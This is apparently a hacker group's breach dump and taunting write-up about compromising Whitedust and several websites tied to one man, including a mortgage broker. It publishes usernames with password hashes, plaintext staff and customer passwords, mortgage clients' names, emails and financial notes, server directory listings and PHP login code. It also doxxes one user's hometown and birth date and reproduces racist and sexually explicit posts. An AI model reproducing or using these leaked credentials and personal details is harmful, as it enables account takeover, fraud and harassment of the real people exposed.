'badeofblade@gmail.com', l33t_tj', 'aae039d6aa239cfc121357a825210fa3', 'eggs@valornet.com', Zal91', '4200e078b8271c31caa0e3a62f8f9a55', 'zal91@bellsouth.net', hrddrv', '177976c88914552313ee72714091c322', 'hrddrv@gmail.com', augur', '20809d7552636da83619561ad6279910', 'augurkun@gmail.com', Chimaera', '51a87efefcd6396b6dfffeaf34ecd93d', 'darkshadow1990@gmail.com', hm', '9aa6e5f2256c17d2d430b100032b997c', 'gailandlala@yahoo.com', kenetik', '4585cc4a2cda77e54f2f2605834d61be', 'kenetik@bitbiters.net', PeterB', '62bacf83093312d1a55d79831905afc9', 'petersgame@msn.com', Tweek888', '008fcaa51c412a6ae71be1487e1f4332', 'tweekdisagrees@gmail.com', phoenix69', '6632511cd5ba03bc07d045474312a2f2', 'greatgt69@yahoo.co.uk', mrbarcode', 'd8c930a5017c1d94541da5032d5c650e', 'cowboyninja@gmail.com', matt', 'f69022ec2e397b8ac97be517f9fd8963', 'mattzab@gmail.com', Drksrc', '893687aeba0744ec2de5099a3b97bfb1', 'jcoyle@winwholesale.com', think', '8fc52b933532f9a4b83206ea5fd0d6c2', 'think_666@yahoo.com', goodguy', '742d4b305e59c8113f38eb0df12f7720', 'gooddeed89@gmail.com', Trikk', '43024376b023da494e94f5799e75b1c7', 'tech7com@gmail.com', misterhak', '1b5f33fc105525d843fa5665bc5d87d7','pinoyclan_community@yahoo.com', MacCool', 'ea5a2ba944083bbb4bb4dcab6e6daf3c', 'maccool71@gmail.com', Hackmo', 'f8b9ed2d08bb3c5bbeeca79485eb1a7f', 'hackmo@gmail.com', iod3k', '71e2ddf172d36e8346cc3763e1cedb9c', 'iod3k@yahoo.com', iod4k', '4d4ac2e5f40c9c25ffe05a05508a519c', 'ineffabilis@hotmail.com', vfrtgb', 'e22a63fb76874c99488435f26b117e37', 'vfrtgb@mailinator.com', rage', 'c4ee146a878e9c065b045707915e9c99', 'rage@iamrage.com', <-- angry revebo', 'fc7e987f23de5bd6562b7c0063cad659', 'byronsmart@gmail.com', Whitedust', 'e7e9f43efcb7f72bca72aad5b79b7847', 'admin@whitedust.net', rexroof', '3aa7433f52c6fadba8a950256c36a0de', 'hakspace@rexroof.com', dthis', '22ec7a3e97bcb747bad69af1e21e02ea', 'decypherthis@gmail.com', bobbie', '1ac0d72d238c86b2029c8419ba2574a2','theangelsprostitute@kittymail.com', Hippie', 'f7baeca263d193cfe02ac27ef2993709', 'Noellelovelle@gmail.com', Moregan', '622cd4323272472ebac51f8a0b04a858', 'moregan@gmail.com', pewp', 'fb52eacf3758541ca36918e8f46bd394', 'pewp@pewp.hack.se', <-- sucker thehive', '87ab1091dadc85902209dee3019cebcd', 'jhammant@gmail.com', cyber_eagle', 'dc63bf106a5f21e436a799565e638ff6','cybereagle@hackerslegion.com', Ll0yd', 'd1130289b1ea13a6b48153a0148974d1', 'tiggur@tiscali.co.uk', kim', '824d431874368f9b4a33ff61b45781cc', 'kimholland@gmail.com', krisgesling', '702cc6ea8896531338876af10ed95a17', 'krisgesling@gmail.com', xof7', 'da6fa909f1c0188c539feb08d4496eb7', 'webtime7@gmail.com', Cookymonsta', '5225fb1447edfac6f38e70b09cf8868f','turningpointteam@hotmail.com', ostmovid', 'd629b54c84af88118c662c6e211dbf1e', 'ostmovid@online.no', 14', 'cc33c66b6365f1e37f9523871b837dfe', 'c-14@hackermail.com', snper12345', '1b98f582482d8143cb0d68e048ea6a8f', 'm81a1@sbcglobal.net', siputsub', '143796d703e154dbfe669726743b5ee1', 'siputsub@yahoo.com', ir0xor', '7bdfd5e45b559e2d7819b61dcd308f04', 'one_two_play@hotmail.com', englishpete', '870e83e084682a2269683929d77ddf8b', 'home@peterbassill.com', bigguns', '161ebd7d45089b3446ee4e0d86dbcf92', 'bblacklidge@gmail.com', mjve', 'c888ff51aaaa5e992ef6559f2857d692', 'michaelvanes01@hotmail.com', picturetaker', '5456fc54c74a297ce994998c2873b370','thisisanfieldxlfc@gmail.com', Trikk', '43024376b023da494e94f5799e75b1c7', 'tech7com@gmail.com', misterhak', '1b5f33fc105525d843fa5665bc5d87d7','pinoyclan_community@yahoo.com', Large', 'c0439fbd53e21ac559d9b0851d0fc439', 'olargeone@gmail.com', Paris_Hilton', 'e7e9f43efcb7f72bca72aad5b79b7847', 'paris@hilton.com', gilvicente21', 'e6dd959ca0aa820fb118e248162c5c78','gil_vicente2003@hotmail.com', Bugs', 'a49b2617faf7603c958606ba876496e9', 'sendai78@gmail.com', syeldan', 'efe6398127928f1b2e9ef3207fb82663', 'syeldan4@yahoo.de', mrbungle', '7f53bffd5ead2b36e0f4079d9def8467', 'mizika@gmail.com', crocodile033', 'c263845d7f4d3395111310792cba78ac','crocodile033@gmail.com', 2old4this', '05f596d647b883159adaf1414688d4f6','londonboyz_786uk@yahoo.co.uk', Spown', 'eedf39d2f48a0782e85f4d93d2c66b30', 'Ptichka_oksana@yahoo.ca', tyriekm', '276f8db0b86edaa7fc805516c852c889', 'tyriekm@gmail.com', aboyandhisrobot', 'f9226917601f102a9094afcbf8b73083','ben@photophobic.net', treo411', '37b4e2d82900d5e94b8da524fbeb33c0', 'treo411@yahoo.ca', piis8', 'cd82b6746062668f56b3467f7592f5be', 'piis8@yahoo.com', signius', '59fde0822a4c110a8269dbf40e56989d', 'darren@signius.co.uk', PriMeZ', 'a93d8ff406dadba858ce749505da96ce', 'tenthmaelstrom@gmai.com', PriMeZzZ', 'a93d8ff406dadba858ce749505da96ce', 'tenthmaelstrom@gmail.com', happy_coder', '275f5d945012ffa70f2bf5c076af18f2','amr_hisham@hotmail.com', Check out this hilarious dogshit Introduction to Whitedust: Having firmly established ourselves as the leading independent security news portal, Whitedust is now the leading distributor of timely and current unbias security news. As we push past our 1st anniversary, Whitedust will capture the attention of an even larger readership by maintaining our uniq ue tradition of reporting the news as it happens, not when it suits us. Confessions REVEALED INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('16', '1176746880', 'I have not found an XSS exploit yet :(', '39'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('28', '1176849651', 'i...i... ime sorry, i program in VB /me runs nd cries', '93'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('35', '1176920362', 'When I see IBM servers I touch myself....', '108'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('38', '1177020530', 'I split a nigga between the eyes with my dick while his ha nds where bound behind his back; I then blind folded him and thrust it into his ass without lubrication. It hurt at first; but we both began to enjoy it near the end.', '40'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('44', '1177290307', 'I used to steal credit cards, then blame it on my friends. .', '68'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('46', '1177577300', 'I love ponies and goatsex.', '153'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('50', '1177689335', 'i pick my nose and have no idea how to crack a network. I just have some random knowledge of shit and know how to use a few tools rofl', '158'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('54', '1177856945', 'I too like bukkake.', '1'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('70', '1178905963', 'One time, at band camp, I ate a ham sandwich. And by ham s andwich, I mean a raccoon.', '20'); INSERT INTO `phpizabi_confess`(`id`, `date`, `body`, `user`) VALUES ('72', '1179152367', 'Sometimes, I piss myself.', '112'); USER:Nick 39:DaMacc 93:screv 108:n00dles 40:LiX <- lix@valvesoftware.co.uk That's what they do at valve. 68:Zakolus <- watch out kid, now the police will be after you. Too bad they know you live in Murfreesboro, Tennesse and that your birthday is 6/12/1989, huh. 153:cr0w_ 158:4ssembler 1:psg 20:Ender 112:cDc <- haha webmaster@cultdeadcow.com pisses himself. No surprise OK enough lame hakspace stuff. We figured it wasn't even worth logging unless we couldn't find a quicker way to own WD. Either way it got defaced immediately. ==endofdayz.net End of Dayz is the name of the stupid book that psg decided to put together. We owned this site. Well, there really isn't much to own: check out some ls: $ ls banner.png cgi-bin countdown.js cover.jpg favicon.ico index.php pressrelease.php psg reviews.php symbol.jpg video.php $ ls cgi-bin/ $ ls psg/ EveInstaller-cracked.exe.torrent cdc-lappy-2.jpg dsc02535.jpg dsc02538.jpg dsc02541.jpg garyftw.jpg massheart.jpg psghadyourmum.png MAC_jon.jpg dsc02533.jpg dsc02536.jpg dsc02539.jpg eve k.txt pan.jpg cdc-lappy-1.jpg dsc02534.jpg dsc02537.jpg dsc02540.jpg freeparis.png mac-suck.png psg-cdc2.jpg $ Notice garyftw.jpg. psg actually kept 42MB of videos of Gary McKinnon over on whitedust.net Feel free to steal psg's lame pictures. ==celbridge4u.com Another website that Mark Anderson owns. Again, not much for us to pwn. $ ls Business_Plan_Draft_1_18.01.07-_Celbridge___District_Network.pdf LAUNCH ANNOUNCEMENT DOCUMENT.pdf index.html Celb[1][1]._&_District_Questionnaire._Draft1.pdf celebridge_network2.jpg Celbridge and District BusinessNetwork registration form (3)-22.02.07.pdf cgi-bin $ ls cgi-bin/ $ ==kildarebiz.com $ ls cgi-bin dev $ ls cgi-bin/ $ ls dev/ captchaimg.php forcelogin.php forcelogout.php includes index.php inkadmin log templates viewdocument.php $ ls dev/includes/ cDatabase.php cLog.php cTemplate.php components conf.php functions.php $ ls dev/includes/components/ ContactForm.php NewSignups.php Poll.php Referral.php Signup.php StaffSignup.php DropdownNavigation.php NewsBrowser.php PollDisplay.php RelatedNews.php SiteMap.php Textbox.php KildareNav.php PauseScroller.php RandomQuote.php Search.php SpecialOffer.php $ ls dev/inkadmin/ clearorphans.php documents.php howto.php logs.php openwysiwyg.zip users.php components.php editglobalelement.php images navigation.php setglobalelement.php configpageelement.php editpageelement.php index.php notes.php setpageelement.php $ head -25 dev/inkadmin/howto.php escape ($_REQUEST['loginUsername']); $password = $db->escape ($_REQUEST['loginPassword']); $query = $db->query("select UserID, Password, RealName, Email, GroupID, AdminFlag from ink_users where (Username = '$username' and AdminFlag = 1)"); $r = $db->fetch_array($query); $dbpassword = $r['Password']; if ($password == $dbpassword) { $_SESSION['Username'] = $username; $_SESSION['UserID'] = $r['UserID']; $_SESSION['RealName'] = $r['RealName']; $_SESSION['Email'] = $r['Email']; } } $ ls dev/log/ log.txt $ ls dev/templates/ AmiJS.js greybox.css home-clane.htm images openwysiwyg subpage-clane.htm blankpage.htm greybox.js home-maynooth.htm kildarebiz.css staffpage.htm subpage-maynooth.htm companypage.htm home-celbridge.htm home.htm kildarebiz.js subpage-celbridge.htm subpage.htm $ Mark Anderson is very bad at everything he does, including webdesign. In this case there is a ton of code reuse and css reuse. Poor poor Mark. He's not a hacker, he's not even a PHP coder. ==www.irelandmortgages.com Another poor attempt by Anderson to get in on making money. We didn't actually know that he worked for this company. When did we find out, you ask? Well, we answer, we found out when we were reading the database for whitedust.net (omg spoiler: Whitedust is coming!). Anderson felt it was wise to include absolutely all of their data in the same database as whitedust.net uses. We think it is important for the customers of www.irelandmortgages.com (don't forget the www lawl) to know the stupidity of the people they are trusting money and information with. A great sign of poor management is when you try to go to the website without a 'www' and this is what you see: Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/steps2home/domains/irelandmortgages.com/public_html/ink/includes/cDa tabase.php on line 46 Could not connect: Access denied for user 'apache'@'localhost' (using password: NO) In case you were wondering about passwords, here they are: INSERT INTO `im2_users` VALUES (1, 'mark', 'landl0rd', 'Mark Anderson', 'me@markanderson.ie', 0); INSERT INTO `im2_users` VALUES (14, 'brendan', 'brendan', 'Brendan Kelly', 'info@irelandmortgages.com', 0); INSERT INTO `im2_users` VALUES (17, 'Eileen', 'rachel8', 'Eileen Egan', 'Eileen@irelandmortgages.com', 0); INSERT INTO `im2_users` VALUES (26, 'jean@irelandmortgages.com', 'Oisin', 'Jean Boyle', 'jean@irelandmortgages.com', 0); We didn't actually ask Mark why he chose such a password (and feels so strongly about using it elsewhere), but if we did this might have been his response: The 0 is for 0wned. The database is horrendous, it has hundreds of lines that look like this: INSERT INTO `im2_appform3` VALUES (406, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ' ', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '' , '', '', '', '', '', '', '', ''); In case you wondered, there are eight appforms. I think they actually differ by a couple of extra fields. We have a ton of info on any www.irelandmortgages.com customers. Here is a small idea of what we may have: CREATE TABLE `im2_clientenquiryform` ( `ClientID` bigint(30) NOT NULL default '0', `ApplicationType` varchar(100) NOT NULL default '', `A1_Name` varchar(100) NOT NULL default '', `A2_Name` varchar(100) NOT NULL default '', `A1_Address` varchar(255) NOT NULL default '', `A2_Address` varchar(255) NOT NULL default '', `A1_DOB` date NOT NULL default '0000-00-00', `A2_DOB` date NOT NULL default '0000-00-00', `A1_DaytimeNumber` varchar(100) NOT NULL default '', `A2_DaytimeNumber` varchar(100) NOT NULL default '', `A1_MobileNumber` varchar(100) NOT NULL default '', `A2_MobileNumber` varchar(100) NOT NULL default '', `A1_Email` varchar(100) NOT NULL default '', `A2_Email` varchar(100) NOT NULL default '', `A1_Occupation` varchar(100) NOT NULL default '', `A2_Occupation` varchar(100) NOT NULL default '', `A1_EmploymentStatus` varchar(100) NOT NULL default '', `A2_EmploymentStatus` varchar(100) NOT NULL default '', `A1_EmployersName` varchar(100) NOT NULL default '', `A2_EmployersName` varchar(100) NOT NULL default '', `A1_BasicSalary` varchar(100) NOT NULL default '', `A2_BasicSalary` varchar(100) NOT NULL default '', `A1_Overtime` varchar(100) NOT NULL default '', `A2_Overtime` varchar(100) NOT NULL default '', `A1_OvertimeFreq` varchar(100) NOT NULL default '', `A2_OvertimeFreq` varchar(100) NOT NULL default '', `A1_Bonus` varchar(100) NOT NULL default '', `A2_Bonus` varchar(100) NOT NULL default '', `A1_BonusFreq` varchar(100) NOT NULL default '', `A2_BonusFreq` varchar(100) NOT NULL default '', `A1_Commission` varchar(100) NOT NULL default '', `A2_Commission` varchar(100) NOT NULL default '', `A1_CommissionFreq` varchar(100) NOT NULL default '', `A2_CommissionFreq` varchar(100) NOT NULL default '', `PurchasePrice` varchar(100) NOT NULL default '', `LoanRequired` varchar(100) NOT NULL default '', `Term` varchar(100) NOT NULL default '', `Rate` varchar(100) NOT NULL default '', `A1_Lender1` varchar(100) NOT NULL default '', `A2_Lender1` varchar(100) NOT NULL default '', `A1_LoanPurpose1` varchar(100) NOT NULL default '', `A2_LoanPurpose1` varchar(100) NOT NULL default '', `A1_LoanBalance1` varchar(100) NOT NULL default '', `A2_LoanBalance1` varchar(100) NOT NULL default '', `A1_LoanRepayment1` varchar(100) NOT NULL default '', `A2_LoanRepayment1` varchar(100) NOT NULL default '', `A1_Lender2` varchar(100) NOT NULL default '', `A2_Lender2` varchar(100) NOT NULL default '', `A1_LoanPurpose2` varchar(100) NOT NULL default '', `A2_LoanPurpose2` varchar(100) NOT NULL default '', `A1_LoanBalance2` varchar(100) NOT NULL default '', `A2_LoanBalance2` varchar(100) NOT NULL default '', `A1_LoanRepayment2` varchar(100) NOT NULL default '', `A2_LoanRepayment2` varchar(100) NOT NULL default '', `A1_Lender3` varchar(100) NOT NULL default '', `A2_Lender3` varchar(100) NOT NULL default '', `A1_LoanPurpose3` varchar(100) NOT NULL default '', `A2_LoanPurpose3` varchar(100) NOT NULL default '', `A1_LoanBalance3` varchar(100) NOT NULL default '', `A2_LoanBalance3` varchar(100) NOT NULL default '', `A1_LoanRepayment3` varchar(100) NOT NULL default '', `A2_LoanRepayment3` varchar(100) NOT NULL default '', `A1_SavingsAccount1` varchar(100) NOT NULL default '', `A2_SavingsAccount1` varchar(100) NOT NULL default '', `A1_SavingsAccount2` varchar(100) NOT NULL default '', `A2_SavingsAccount2` varchar(100) NOT NULL default '', `A1_Category` varchar(100) NOT NULL default '', `A2_Category` varchar(100) NOT NULL default '', `A1_ValueExisting` varchar(100) NOT NULL default '', `A2_ValueExisting` varchar(100) NOT NULL default '', `A1_MortgageBalanceOutstanding` varchar(100) NOT NULL default '', `A2_MortgageBalanceOutstanding` varchar(100) NOT NULL default '', `A1_ExistingLender` varchar(100) NOT NULL default '', `A2_ExistingLender` varchar(100) NOT NULL default '', `A1_LoansToBeRefinanced` varchar(100) NOT NULL default '', `A2_LoansToBeRefinanced` varchar(100) NOT NULL default '', `A1_PotentialRentalIncome` varchar(100) NOT NULL default '', `A2_PotentialRentalIncome` varchar(100) NOT NULL default '', `FoundHouse` varchar(10) NOT NULL default '', `AddressNewHouse` varchar(255) NOT NULL default '', `PaidBookingDeposit` varchar(10) NOT NULL default '', `WouldLikeConsultation` varchar(10) NOT NULL default '', `DesiredDate` varchar(100) NOT NULL default '', `DesiredTime` varchar(100) NOT NULL default '', `HeardAbout` varchar(255) NOT NULL default '', `Comments` varchar(255) NOT NULL default '', `RequireSolicitor` varchar(10) NOT NULL default '', `RequireSnagger` varchar(10) NOT NULL default '', `Step` varchar(100) NOT NULL default '', `StepNumber` int(10) NOT NULL default '0', `StatusText` varchar(255) NOT NULL default '', `LastAccess` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `ClosingDate` date NOT NULL default '0000-00-00', `MiscText` varchar(255) NOT NULL default '', `Date` varchar(100) NOT NULL default '', `MortgageRefNo` varchar(100) NOT NULL default '', `LifeCompanyPolicyNumber` varchar(100) NOT NULL default '', PRIMARY KEY (`ClientID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; And you may find this interesting: CREATE TABLE `im2_clientlogin` ( `ID` bigint(30) NOT NULL auto_increment, `Email` varchar(255) NOT NULL default '', `Password` varchar(255) NOT NULL default '', `Locked` tinyint(2) NOT NULL default '0', PRIMARY KEY (`ID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=415 ; -- -- Dumping data for table `im2_clientlogin` -- INSERT INTO `im2_clientlogin` VALUES (120, 'ciaran.oreilly@gmail.com', 'moreput', 0); INSERT INTO `im2_clientlogin` VALUES (205, 'scott.wishart@intel.com', 'mostmay', 0); INSERT INTO `im2_clientlogin` VALUES (211, 'scott.wishart@intel.com', 'dayworld', 0); INSERT INTO `im2_clientlogin` VALUES (184, 'scott.wishart@intel.com', 'beenanother', 0); INSERT INTO `im2_clientlogin` VALUES (145, 'Niall.Carroll@hilton.com', 'whothere', 0); INSERT INTO `im2_clientlogin` VALUES (174, 'victoria.vogel@marine.ie', 'therethe', 0); INSERT INTO `im2_clientlogin` VALUES (144, 'jonathan.mcevoy@intel.com', 'beenlast', 0); INSERT INTO `im2_clientlogin` VALUES (118, 'brendan:@irelandmortgages.com', 'andhow', 0); INSERT INTO `im2_clientlogin` VALUES (129, 'ciaran.oreilly@gmail.com', 'saidshow', 0); INSERT INTO `im2_clientlogin` VALUES (116, 'emma-keanr@hotmail.com', 'forcan', 0); INSERT INTO `im2_clientlogin` VALUES (117, 'ciaran.oreilly@gmail.com', 'madethen', 0); INSERT INTO `im2_clientlogin` VALUES (261, 'scott.wishart@intel.com', 'threesound', 0); INSERT INTO `im2_clientlogin` VALUES (182, 'scott.wishart@intel.com', 'othertake', 0); INSERT INTO `im2_clientlogin` VALUES (132, 'info@irelandmortgages.com', 'partfor', 0); INSERT INTO `im2_clientlogin` VALUES (185, 'brucecrehan@yahoo.com', 'threeeven', 0); INSERT INTO `im2_clientlogin` VALUES (135, 'ciaran.oreilly@gmail.com', 'rightcan', 0); INSERT INTO `im2_clientlogin` VALUES (136, 'eimeardawson@iname.com', 'whilenow', 0); INSERT INTO `im2_clientlogin` VALUES (137, 'scott.wishart@intel.com', 'numberwho', 0); INSERT INTO `im2_clientlogin` VALUES (369, 'geoff@wildcard.ie', 'showread', 0); INSERT INTO `im2_clientlogin` VALUES (243, 'scott.wishart@intel.com', 'throughtwo', 0); INSERT INTO `im2_clientlogin` VALUES (158, 'jonathan.mcevoy@intel.com', 'useway', 0); INSERT INTO `im2_clientlogin` VALUES (141, 'a.brown@frkelly.ie', 'everyfew', 0); INSERT INTO `im2_clientlogin` VALUES (142, 'jonathan.mcevoy@intel.com', 'smallsmall', 0); INSERT INTO `im2_clientlogin` VALUES (143, 'anthony.dunne@prioneerinvestment.ie', 'shethrough', 0); INSERT INTO `im2_clientlogin` VALUES (183, 'brucecrehan@yahoo.com', 'helpold', 0); INSERT INTO `im2_clientlogin` VALUES (257, 'scott.wishart@intel.com', 'whereaway', 0); INSERT INTO `im2_clientlogin` VALUES (150, 'james.donnelly@ulsterbank.com', 'whereman', 0); INSERT INTO `im2_clientlogin` VALUES (344, 'yasinx.ali@intel.com', 'suchwas', 0); INSERT INTO `im2_clientlogin` VALUES (323, 'ndunne06@hotmail.com', 'helpsame', 0); INSERT INTO `im2_clientlogin` VALUES (157, 'miceal.f.mcevoy@intel.com', 'airmay', 0); INSERT INTO `im2_clientlogin` VALUES (219, 'scott.wishart@intel.com', 'putwork', 0); INSERT INTO `im2_clientlogin` VALUES (250, 'scott.wishart@intel.com', 'dayaway', 0); INSERT INTO `im2_clientlogin` VALUES (162, 'Patrick.Power@daiwasectab.ie', 'nameshow', 0); (Rest of list cutoff: Pointless). Watch them keep up to date on your properties: INSERT INTO `im2_finalvaluation` VALUES (294, '', '', '', '', '', '', '', '', '', '', '', '', '', ''); (Almost the entire table looks like that) On all of the clients, we have this kind of information: INSERT INTO `im2_overview` VALUES (221, '', '', 'Client already owns a PDH and an Investment property in celbridged valued at 700k with a sma ll mortgage oustanding on PDH. Current mortgage with Irish Nationwide. Requires 100k to buy 2 sites in limerick and will cross secure with existing properties', '', '', '', '', '', '', '', '', '', '', '', '13', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ' ', '', '', '', '', '', '', '', ''); and this kind of information! INSERT INTO `im2_overview2` VALUES (229, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''); and of course the classic: INSERT INTO `im2_overview3` VALUES (401, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ' '); Of course, anything they have ever done with their customers is stored in this db. Like so: INSERT INTO `im2_salestasks` VALUES (297, 0, '', '1150070461', 'Followup with Sean White (get him to contact his doctor re PMA report (go bac k to Paul in Eagle Star)', 1, 1, '12', '6', '2006', 'Brendan Kelly'); Customers need to ask themselves some question. 1. Why does the owner use his first name as a password? 2. Why does the coder use the same password as he uses elsewhere? 3. Why do none of the four employees use a password longer than eight characters? 4. Why are we employing a coder who pretends to be a hacker in his spare time? 5. Why is our database being stored with the database of a site that has been publicly targetted by hackers? 6. Why are these passwords not hashed? 7. What kind of lame hack wrote this site and designed this database? 8. Why did I decide to give my money to these chavs in the first place, especially as they only act as a middle-man for mortgages? Brenden Kelly has apparently spent 17 years in the financial services sector, but is new to teh internets! Yes, this database if full of crap. 27,000 lines of crap. But mixed in all of that crap there is personal information for all of the customers. We are not going to do anything malicious with the information at our hands. But that doesn't mean that nobody else will (or possibly already has). We feel that this service did a fine job of representing itself as safe, and users had no specific reason to expect it to get hacked. It is our opinion that these clients (should they exist) should be contacted and have the situation explained to them. If someone would like to take this noble task upon themselves, here is some contact information. Some of the data has been cutoff and there are duplicates (why?), but...noone cares. (@ changed to (a) to limit potential spam :-) 'Sean Keane', 'brendan(a)irelandmortgages.com'); 'Maria Hogan & Oliver O Farrell', 'oliver.o\\''farrell(a)smartforc 'Maria Hogan & Oliver O Farrell', 'oliver.o\\''farrell(a)smartforc 'Niamh O Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com'); 'Gemma & Eimear Campion', 'gemma(a)microsoft.com'); 'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com'); 'Grainne O Connor & Sean Leahy', 'groconnor(a)lehman.com'); 'Robert O Reilly & Karen Hynes', 'oreilly(a)hp.com'); 'Pat Byrne', 'pbyrne(a)rainmaker.ie'); 'Niall Kelleher', 'niall(a)combinedlegal.ie'); 'Derek Mc Donnell', 'manager.knocklyon(a)superquinn.ie'); 'PLACEHOLDER', 'PLACEHOLDER'); 'Brendan Kelly', 'brendan(a)irelandmortgages.com'); 'PLACEHOLDER', 'PLACEHOLDER'); 'Brendan Egan & David White', 'brendan.a.egan(a)intel.com'); 'Alison O Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co.uk' 'Alison O Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co.uk' 'Kevin & Catherine Povall', 'kevpovall(a)eircom.net'); 'Tom & Aideen Maher', 'tmaher61(a)indigo.ie'); 'Joseph McCormack & Eimear Keogh', 'I.keogh(a)dublinpeople.com'); 'Mark Geoghegan', 'aquaclean(a)eircom.net'); 'Gordon Flood & Sarah Halgarth', 'gordonflood(a)eircom.net'); 'Alvin Dagge & Sonya Walshe', 'alvin.dagge(a)geapt.ie'); 'Louise Hogan & Colm Devitt', 'louise(a)bluepages.ie'); 'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com'); 'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com'); 'Thomas Foley & Claire Hedderman', 'tomf(a)bizquir.ie'); 'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com'); 'Suzanne Wren', 'suzanne.wren(a)map.ie'); 'Gunther Plank & Bernice Howe', 'Plank_Gun(a)yahoo.ie'); 'Kerian Gorey & Claire Moran', 'cmoran(a)kildarecoco.ie'); 'Paul Barry', 'pbstbsttdr(a)aol'); 'Raymond & Jenny Wallace', 'raymondpwallace(a)eircom.net'); 'Fiona Balfe', 'fiona(a)olympia.ie'); 'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie'); 'Leona Keegan & Ciaran Cullinan', 'leona_keegan(a)ml.com'); 'Mary Butler & Ciaran Hughes', 'mary.butler(a)unilever.com'); 'Ian Deacon & Anna-Marie Brennan', 'ideac123(a)hotmail.com'); 'Gavin Egan', 'gegan01(a)yahoo.com'); 'Helene Enberg', 'helene_enberg(a)hotmail.com'); 'Michael & Geraldine Littler', '8littleg(a)ie.ibm.com'); 'Niamh O Connor & Jonathan Myer', 'niamhoconnor(a)hotmail.com'); 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contechirel 'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contechirel 'Adrian & Ann Marie Phelan', 'aphelan(a)tarasupport.co.uk'); 'David Flanagan', 'davidflanagan(a)hotmail.com'); 'Patrick & Janet Hobbs', 'pandjhobbs(a)eircom.net'); 'Dermot & Lorraine McMullen', 'dermotmcm(a)oceanfree.net'); 'Sean Cassidy & Shakris Nelis', 'sean_cassidy(a)ryan-hotels.com'); 'Donall & Siobhan Howe', 'howby(a)eircom.net'); 'Ciara O Connor & Kevin Nee', 'ciara.oconnor(a)db.com'); 'Dermot & Maureen Peakin', 'maureenpeakin(a)hotmail.com'); 'Gerry & Marian Murphy', 'cgmurphy.gofree.eircom.ie'); 'Stephen & Patricia Beirnes', 'sbeirnes(a)eircom.net'); 'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie'); 'Caroline Kirwin & Mark Lynch', 'ckirwan(a)eircell.ie'); 'Anthony & Ann Burton', 'aburton(a)uprighteuro.com'); 'Michael Nolan', 'mnolans(a)eircom.net'); 'Evgeny Kudryashov', 'brendan(a)irelandmortgages.com'); 'Alan Mooney & Claire Noonan', 'mooneyalan(a)aol.com'); 'Elaine O Rourke & Mark Davis', 'elaine(a)tpi.ie'); 'Margaret Wade', 'Mwade(a)ait.ie'); 'Gus Lynch', 'gus_lynch(a)dell.com'); 'Joss Morkens', 'joss(a)iol.ie'); 'Test', 'PLACEHOLDER', 'PLACEHOLDER'); 'Brendan Quinn & Claire Garvey Quinn', 'brendanquinn(a)hotmail 'Brendan Quinn & Claire Garvey Quinn', 'brendanquinn(a)hotmail 'Karl Dwyer', 'karl.dwyer(a)exel.com'); 'Sandra Byrne', 'sandrabyrne(a)frenchassiciates.com'); 'Niamh O Connor & Jonathan Myers', 'niamhoconnor(a)thesrgrdup. 'Niamh O Connor & Jonathan Myers', 'niamhoconnor(a)thesrgrdup. 'Jeff Eldridge & Sarah Barry', 'sarah(a)jeffelbridge.com'); 'Ciara O Connor & Kevin Nee', 'ciara.oconnor(a)db.com'); 'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie') 'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie') 'Gareth Egan & Eileen Mooney', 'egang(a)mortgagelink.ie'); 'David Quaid', 'david.quaid(a)escapesoftware.com'); 'Brendan Egan', 'brendan.a.egan(a)intel.com'); 'Anthony & Susan Dunne', 'anthony.dunne(a)pioneerinvest.ie'); 'Stephen & Patricia Beirnes', 'sbeirnes(a)eircom.net'); 'Stephen & Lidice Berningham', 'stephen.bermingham(a)connectcg 'Stephen & Lidice Berningham', 'stephen.bermingham(a)connectcg 'Robert O\\''Reilly & Karen Hynes', 'oreilly(a)hp.com'); 'Helen Sheridan', 'helenthegreat(a)hotmail.com'); 'Stephen Young & Caroline Hughes', 'stephen.young(a)dublin.com 'Stephen Young & Caroline Hughes', 'stephen.young(a)dublin.com 'Joseph & Ann Barry', 'annbarry(a)iolfree.ie'); 'Michael & Carmel O\\''Brien', 'm.obrien7(a)networld.ie'); 'Morgan Keogh & Hillary Madden', 